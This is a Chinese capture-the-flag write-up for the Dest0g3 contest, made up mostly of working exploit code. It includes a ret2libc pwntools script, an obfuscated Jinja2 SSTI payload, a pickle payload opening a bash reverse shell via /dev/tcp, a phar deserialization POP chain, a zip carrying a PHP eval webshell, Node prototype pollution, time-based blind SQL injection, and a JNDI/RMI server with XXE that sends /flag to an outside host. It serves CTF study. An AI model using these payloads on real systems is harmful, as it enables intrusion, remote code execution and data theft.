Dest0g3迎新赛wp

签到

签到

ez_pwn

from pwn import *
# pwntools setup for a 32-bit Linux target. The second assignment immediately
# overrides the 'debug' log level requested on the line above.
context(os='linux', arch='i386', log_level='debug')
context.log_level='info'
elf=ELF('./p')
rop=ROP(elf)  # NOTE(review): rop is never used anywhere in this script

# p=process('./p')
p=remote('node4.buuoj.cn',28566)  # remote challenge instance; swap for the local process above when debugging

def add(num):
    """Pick menu option 1 and submit *num* as the value to store.

    *num* is sent verbatim; callers pass it already stringified.
    """
    p.sendlineafter('ut your choice:\n', '1')
    p.sendlineafter('input num\n', num)
def pad():
    """Answer the array-length prompt and pre-fill twelve slots.

    The length sent is INT_MIN; ten zeros are followed by a marker value and
    the entries the author labels ``choice`` and ``count``, which position the
    values the caller writes next (presumably at the saved return address —
    confirm against ./p).
    """
    p.sendlineafter("th of array:\n", '-2147483648')
    for _ in range(10):
        add('0')
    # marker, then the "choice" and "count" slots
    for value in ('114514', '1', '17'):
        add(value)
# Static addresses read from the target binary (used as absolute values
# below, so presumably a non-PIE build — confirm): puts@plt, the hackme
# symbol, and the two GOT slots whose contents are leaked as libc pointers.
plt_addr=elf.plt['puts']
hackme_addr=elf.sym['hackme']

libc_start_main_got = elf.got['__libc_start_main']
puts_got=elf.got['puts']
def get_libc():
    """Leak the runtime addresses behind __libc_start_main@got and puts@got.

    Dead code in this script (its call at the bottom is commented out);
    presumably used once to fingerprint the remote libc before ``pwn()``
    was written against './1.6.so'. The locals below shadow the
    module-level names holding the same values.
    """
    plt_addr=elf.plt['puts']
    hackme_addr=elf.sym['hackme']

    libc_start_main_got = elf.got['__libc_start_main']
    puts_got=elf.got['puts']

    # Round 1: puts@plt, return target (hackme), then the GOT slot to print.
    pad()
    add(str(plt_addr))
    add(str(hackme_addr))
    add(str(libc_start_main_got))

    p.sendlineafter('ut your choice:\n','4')
    p.recvuntil('exit!\n')
    # NOTE(review): ljust() pads with a str fill char; under Python 3 recv()
    # returns bytes and this would raise TypeError — the script appears to be
    # written for Python 2.
    libc_start_main_addr =u32(p.recv(4).ljust(4, '\x00'))

    # Round 2: same chain, printing puts@got instead.
    pad()
    add(str(plt_addr))
    add(str(hackme_addr))
    add(str(puts_got))

    p.sendlineafter('ut your choice:\n','4')
    p.recvuntil('exit!\n')
    # Rebinds puts_got from the GOT slot address to the leaked runtime address.
    puts_got =u32(p.recv(4).ljust(4, '\x00'))

    print('[*] libc_start_main_addr: '+hex(libc_start_main_addr))
    print('[*] puts_got_addr : '+hex(puts_got))
def pwn(libc):
    """Leak __libc_start_main, derive the libc base from *libc*, then call system("/bin/sh").

    Args:
        libc: pwntools ELF of the libc matching the remote ('./1.6.so' below).
    """
    # Round 1: puts@plt, return target (hackme), GOT slot to print.
    pad()
    add(str(plt_addr))
    add(str(hackme_addr))
    add(str(libc_start_main_got))
    p.sendlineafter('ut your choice:\n','4')
    p.recvuntil('exit!\n')
    # NOTE(review): str fill char — only valid where recv() returns str (Python 2).
    libc_start_main_addr =u32(p.recv(4).ljust(4, '\x00'))
    print('[*] libc_start_main_addr: '+hex(libc_start_main_addr))
    base=libc_start_main_addr-libc.symbols['__libc_start_main']
    binsh=base+next(libc.search('/bin/sh'))
    system=base+libc.symbols['system']
    # Round 2: system, a filler return value, then the "/bin/sh" pointer.
    # signed() because the menu presumably parses input as a signed 32-bit
    # integer (pad() sends INT_MIN as the length) — confirm.
    pad()
    add(str(signed(system)))
    add('1919810')
    add(str(signed(binsh)))
    p.sendlineafter('ut your choice:\n','4')
    p.recvuntil('exit!\n')
    p.interactive()
# get_libc()  # leak-only run; left disabled once the libc build was identified
libc=ELF('./1.6.so')  # libc build matching the remote target
pwn(libc)

phpdest

用这篇文章的payload

https://www.anquanke.com/post/id/213235

EasyPHP

post ctf[]=1触发报错

simple rce

取反码

// PHP: ~ flips every bit of each byte (the "取反" trick above), so the
// string holds no plaintext keyword; the server side undoes it with
// ~urldecode(...), as the commented example below shows.
echo urlencode(~"cat ./*;cat /*;");
// (~urldecode("%8C%86%8C%8B%9A%92"))(~urldecode("%88%97%90%9E%92%96"));

funny_upload

上传.htaccess

AddType application/x-httpd-php png
php_value auto_append_file /flag

然后传foo.png,访问

easy ssti

import requests
# Jinja2 SSTI payload. Every identifier is assembled from filter output
# (dict(...)|join, self|string|min, urlencode|first, ...) rather than literal
# characters; the final loops walk self.__init__.__globals__ to the builtins
# entry and call its eval on the string built in `pld`.
pay="{% set zero = (self|int) %}{% set one = (zero**zero)|int %}{% set two = (zero-one-one)|abs %}{% set four = (two*two)|int %}{% set five = (two*two*two)-one-one-one %}{% set three = five-one-one %}{% set nine = (two*two*two*two-five-one-one) %}{% set seven = (zero-one-one-five)|abs %}{% set space = self|string|min %}{% set point = self|float|string|min %}{% set c = dict(c=aa)|reverse|first %}{% set bfh = self|string|urlencode|first %}{% set bfhc = bfh~c %}{% set slas = bfhc%((four~seven)|int) %}{% set yin = bfhc%((three~nine)|int) %}{% set xhx = bfhc%((nine~five)|int) %}{% set right = bfhc%((four~one)|int) %}{% set left = bfhc%((four~zero)|int) %}{% set but = dict(buil=aa,tins=dd)|join %}{% set imp = dict(imp=aa,ort=dd)|join %}{% set pon = dict(po=aa,pen=dd)|join %}{% set so = dict(o=aa,s=dd)|join %}{% set ca = dict(ca=aa,t=dd)|join %}{% set flg = dict(fl=aa,ag=dd)|join %}{% set ev = dict(ev=aa,al=dd)|join %}{% set red = dict(re=aa,ad=dd)|join %}{% set bul = xhx~xhx~but~xhx~xhx %}{% set ini = dict(ini=aa,t=bb)|join %}{% set glo = dict(glo=aa,bals=bb)|join %}{% set itm = dict(ite=aa,ms=bb)|join %}{% set pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %}{% for f,v in (self|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %}{% if f == bul %}{% for a,b in (v|attr(itm))() %}{% if a == ev %}{{b(pld)}}{% endif %}{% endfor %}{% endif %}{% endfor %}"
# Spaces are replaced with newlines before sending — presumably the input
# filter rejects spaces but Jinja2 accepts any whitespace inside tags; confirm.
pay=pay.replace(' ','\n')
# Challenge instance; the template is injected through the username field.
r=requests.post(url='http://fc94b957-c0f8-4d55-97e7-af20cd377917.node4.buuoj.cn:81/login',data={
    'username':pay,
    'password':'123'
})
print(r.text)

middle

用pker写的

# pker input (compiled to pickle opcodes, not executed as Python): GLOBAL
# resolves config.backdoor, and the call applies it to a one-element list
# holding the command string.
backdoor=GLOBAL('config', 'backdoor')
backdoor(["__import__('os').system('bash -c \\'bash -i >& /dev/tcp/ip/port 0>&1\\'')"])
return

pharpop

用tree写phar,末尾少写一个}绕过报错。phar反序列化报错用gc回收机制绕

http://arsenetang.com/2021/11/29/WP篇之解析GFCTF---文件查看器/#构造pop链

最后实例化原生类DirectoryIterator配合glob协议读目录,再SplFileObject读文件

<?php

/** Stub mirroring the challenge's air class; $p is set to a tree below. */
class air{
    public $p;
}

/**
 * Stub mirroring the challenge's tree class. $name holds the next object of
 * the chain; $act is set below to the name of the native class to instantiate.
 */
class tree{
    public $name;
    public $act;
}

/**
 * Stub mirroring the challenge's apple class. $xxx holds an air; $flag carries
 * the path/glob handed on ("glob:///f*" below).
 */
class apple {
    public $xxx;
    public $flag;
}

/**
 * Stub mirroring the challenge's D class. $start selects the server-side
 * action; the requests further below send 'r' (read) and 'w' (write).
 */
class D {
    public $start;

}

/** Declared to mirror the challenge source; not used by the chain below. */
class banana {
}
// Object chain: tree($t3) -> tree($t2) -> apple -> air -> tree($t1), where the
// innermost tree names the native class that gets instantiated with $apple->flag.
$t1 = new tree();
$t1->act = "DirectoryIterator";   // pass 1: list the directory via glob://
// $t1->act = "SplFileObject";    // pass 2: read the file found in pass 1

$air = new air();
$air->p = $t1;

$apple = new apple();
$apple->xxx = $air;
$apple->flag = "glob:///f*";      // argument for the native class above
// $apple->flag = "/fflaggg";     // pass 2 counterpart

$t2 = new tree();
$t2->name = $apple;

$t3 = new tree();
$t3->name = $t2;
// Metadata is an array with a trailing null: the deliberately malformed
// metadata errors out and is reached through GC instead (the bypass the
// note above describes).
$exp=array($t3,null);
$phar_file = serialize($t3);
echo $phar_file;   // printed for reference only; the phar carries $exp

$filename = 'poc.phar';// the suffix must be .phar, otherwise the script cannot run
file_exists($filename) ? unlink($filename) : null;
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ");   // GIF magic first, presumably so the upload passes as an image
$phar->setMetadata($exp);
$phar->addFromString("foo.txt","bar");
$phar->stopBuffering();
import requests
import gzip
from hashlib import sha1
import io
url='http://9c2714e2-6a43-4c97-815c-b7e31785fbad.node4.buuoj.cn:81/'  # challenge instance
# url='http://127.0.0.1:8989'  # local reproduction
# Earlier probes kept for reference. Field '1' is a serialized D whose start
# byte picks the action ('r' read / 'w' write, see read()/write() below); the
# /tmp path is apparently where the server stored a previous upload.
# r=requests.post(url,data={'0':'flag','1':'O:1:"D":1:{s:5:"start";s:1:"r";'})

# r=requests.post(url,data={'0':open('poc.png','rb'),'1':'O:1:"D":1:{s:5:"start";s:1:"w";'})
# /tmp/611a123795fb16602f0762cc3905a90c.jpg
# r=requests.post(url,data={'0':'phar:///tmp/611a123795fb16602f0762cc3905a90c.jpg','1':'O:1:"D":1:{s:5:"start";s:1:"r";'})
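def sign(name, out='signed.phar'):
    """Re-sign a modified phar archive and write the result to *out*.

    A phar ends with ``<signature><4-byte signature type>GBMB``. The slicing
    assumes the existing signature is SHA-1 (20 bytes, hence 28 = 20 + 8),
    so only SHA-1 signed archives are handled correctly.

    Args:
        name: path of the modified phar, read as bytes.
        out: destination path; defaults to the original hard-coded name.

    Returns:
        None. Both files are closed via ``with`` (the original leaked both handles).
    """
    with open(name, 'rb') as fh:
        data = fh.read()            # the phar after its contents were edited
    body = data[:-28]               # bytes covered by the signature
    trailer = data[-8:]             # signature type + GBMB magic
    with open(out, 'wb') as fh:     # data + signature + type + GBMB
        fh.write(body + sha1(body).digest() + trailer)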
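def compress(name, out='signed.phar.gz'):
    """Gzip the file at *name* into *out* (default 'signed.phar.gz').

    Both streams are held by ``with`` so the gzip trailer is written and the
    handles are closed even if the read fails (the original only closed the
    gzip stream on the success path).
    """
    with open(name, 'rb') as src, gzip.open(out, 'wb') as dst:
        dst.write(src.read())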
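def write(name):
    """Upload the bytes of *name* through the 'w' action of class D and print the reply.

    The file is read inside ``with`` (the original leaked the handle).
    """
    with open(name, 'rb') as fh:
        content = fh.read()
    r = requests.post(url, data={'0': content, '1': 'O:1:"D":1:{s:5:"start";s:1:"w";'})
    print(r.text)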
def read(name):
    """Ask the server to open ``phar://<name>`` via the 'r' action of class D and print the reply."""
    form = {
        '0': 'phar://' + name,
        '1': 'O:1:"D":1:{s:5:"start";s:1:"r";',
    }
    print(requests.post(url, data=form).text)
def make():
    """Upload the prepared archive.

    The sign and compress steps were run once by hand and are left disabled;
    only the upload of their output remains live.
    """
    # sign('poc.phar')
    # compress('signed.phar')
    write('signed.phar.gz')
# make()  # build/upload step; disabled once the archive was stored server-side
read('/tmp/c60420862a82f1d08f0c980f23ee6eef.jpg')  # apparently the server-side path of the uploaded archive

ezip

文件名/////让解压fail

import zipfile
 
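def main():
    """Build test2.zip holding 1.php plus an entry whose name is only slashes.

    The slash-only entry name (see the note above) makes the server-side
    extraction fail. The archive is opened in append mode, so an existing
    test2.zip is extended rather than replaced. Compared with the original:
    the archive is closed via ``with`` even when a write fails, the unused
    ZipInfo is gone, and the ``except IOError: raise e`` wrapper was dropped
    since it only re-raised the same exception.
    """
    with zipfile.ZipFile("test2.zip", "a", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("1.php", '<?php eval($_POST["1"]); ?>')
        archive.writestr("/////", '111')


if __name__ == "__main__":
    main()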

suid提权,在/usr下找到了nl,nl /flag

node so easy

def pwn(payload):
    """POST *payload* as the JSON body to ``url`` and print the response text."""
    response = requests.post(url, json=payload)
    print(response.text)
if __name__ == '__main__':
    # Prototype-pollution payload: if the server merges this JSON into an
    # object recursively, the nested constructor.prototype keys land on
    # Object.prototype and every object inherits `client` and
    # `escapeFunction`. The latter is a JS fragment that the template engine
    # presumably splices into generated code — confirm against the challenge
    # source.
    payload={
        "constructor": {
            "prototype": {
                "client": "true",
                "escapeFunction": "1;return process.mainModule.require('fs').readFileSync('/flag').toString()//"
            }
        }
    }
    pwn(payload)

两道sql

benchmark时间注入

import requests
import time
url='http://b63d2144-cc9a-4649-8046-a11a28dd2cb1.node4.buuoj.cn:81'  # challenge instance
def test(bool):
    """Return True when the injected condition *bool* makes the login take over one second.

    The condition is spliced into the username so that a true branch runs
    benchmark(1000000, sha(1)); wall-clock duration of the request is the
    oracle. (The parameter name shadows the builtin; kept for callers.)
    """
    started = time.time()
    probe = f"'||if(({bool}),(benchmark(1000000,sha(1))),0)||'1"
    print(probe)
    requests.post(url, data={'username': probe, 'password': '123'})
    elapsed = time.time() - started
    return elapsed > 1
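def pwn():
    """Recover the target column one character at a time with the timing oracle in test().

    Characters are tried from ASCII 32 to 126 at each position; when none
    matches, the result so far is printed and the function returns. The
    original rebound ``select`` three times (dead assignments, kept below as
    the enumeration history) and shadowed the ``bool`` builtin; both are
    cleaned up without changing behavior.
    """
    # Enumeration steps the author ran before the final query:
    #   database()
    #   select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')
    #   select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')
    select = "select(cmd)from(flaggg)"

    result = ''
    for pos in range(1, 100):
        for guess in range(32, 127):
            if test(f'ascii(mid(({select}),{pos},1))={guess}'):
                break
        else:
            # printable range exhausted: end of string (or the oracle missed)
            print(result)
            return
        result += chr(guess)
        print(result)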
if __name__=='__main__':
    # print(test("select(database())='ctf'"))  # sanity check of the timing oracle
    pwn()

ezserial

/admin下cookie注入,commonscollections6弹shell

ljctr

改一下com.mchange.v2.naming.ReferenceIndirector#IndirectlySerialized

    /**
     * Patched version of the c3p0 gadget: ignores {@code paramObject} and always
     * emits a reference naming the fixed RMI location, wrapped with this
     * instance's environment properties.
     *
     * @param paramObject unused; retained for the original signature
     * @return a ReferenceSerialized carrying the hard-coded RMI CompoundName
     * @throws Exception propagated from CompoundName parsing
     */
    public IndirectlySerialized indirectForm(Object paramObject) throws Exception {
        Name rmiName = new CompoundName("rmi://ip:1234/Evil", new Properties());
        return new ReferenceSerialized(null, null, rmiName, this.environmentProperties);
    }

rmi server返回org.apache.catalina.users.MemoryUserDatabaseFactory,XXE

package com.example.idea;


import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

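public class Server {

    /**
     * Starts an RMI registry on port 1234 and binds, under the name "Evil", a
     * JNDI Reference whose factory is Tomcat's MemoryUserDatabaseFactory with
     * the database pathname pointing at an HTTP URL (the XML below).
     *
     * The original placed the System.setProperty call directly in the class
     * body, which is not valid Java and does not compile; it now runs first in
     * main, before the registry exports any stub, since java.rmi.server.hostname
     * is the host advertised in exported stubs.
     *
     * @param args unused
     * @throws Exception from registry creation or binding
     */
    public static void main(String[] args) throws Exception {
        System.setProperty("java.rmi.server.hostname", "Ip");
        Registry registry = LocateRegistry.createRegistry(1234);

        ResourceRef ref = new ResourceRef("org.apache.catalina.UserDatabase", null, "", "", true,
                "org.apache.catalina.users.MemoryUserDatabaseFactory", null);
        ref.add(new StringRefAddr("pathname", "http://ip/post.xml"));

        registry.bind("Evil", new ReferenceWrapper(ref));
    }

}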
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag[
<!ENTITY % dtd SYSTEM "http://ip/exp.xml">
%dtd;
%int;
%send;
]>
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://ip/%file;'>">

生成base64

package com.example.idea;


import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import com.mchange.v2.naming.ReferenceIndirector;
import com.mchange.v2.ser.IndirectlySerialized;

import javax.naming.*;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.*;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.Enumeration;
import java.util.Properties;
import java.util.logging.Logger;
import java.util.Base64;
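public class Test {
    /**
     * Builds a PoolBackedDataSource without running its constructor, prints its
     * Java-serialized form as base64 (the payload the write-up sends), then
     * deserializes the same bytes locally as a smoke test.
     */
    public static void main(String[] args) throws Exception{
//        com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized
//        Name name=new CompoundName("rmi://127.0.0.1:1234/Evil",pros);
        PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
//        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
//        javax.el.ELProcessor
        byte[] bb=serialize(b);
        System.out.println(Base64.getEncoder().encodeToString(bb));
        deserialize(bb);
//        org.yaml.snakeyaml.Yaml
    }

    /**
     * Java-serializes {@code o}. Streams are closed by try-with-resources
     * on every path (the original leaked them when writeObject threw).
     *
     * @param o the object graph to serialize
     * @return the serialized bytes, or {@code null} if serialization failed;
     *         the failure is printed, and main then hands null to
     *         deserialize(), which reports it as a NullPointerException
     */
    public static byte[] serialize(Object o) {
        try (ByteArrayOutputStream aos = new ByteArrayOutputStream();
             ObjectOutputStream oos = new ObjectOutputStream(aos)) {
            oos.writeObject(o);
            oos.flush();
            return aos.toByteArray();
        } catch (Exception e) {
            e.printStackTrace();
        }
        return null;
    }

    /**
     * Deserializes {@code bytes} with a plain, unfiltered ObjectInputStream and
     * discards the result: the local smoke test for the payload main() prints.
     * Any exception (including a null argument) is printed, not propagated.
     *
     * @param bytes a Java serialization stream
     */
    public static void deserialize(byte[] bytes) {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}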

起rmi,发包,看看logs即可收到flag
